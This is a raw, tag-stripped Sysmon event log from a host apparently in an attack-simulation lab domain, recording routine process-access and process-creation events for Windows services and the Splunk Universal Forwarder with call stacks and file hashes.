14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.218{59A5CD1D-94CA-6005-4805-00000000A301}41605916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.063{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:47.078{59A5CD1D-94CA-6005-4905-00000000A301}60086816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.843{59A5CD1D-94CC-6005-4B05-00000000A301}59724916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.688{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
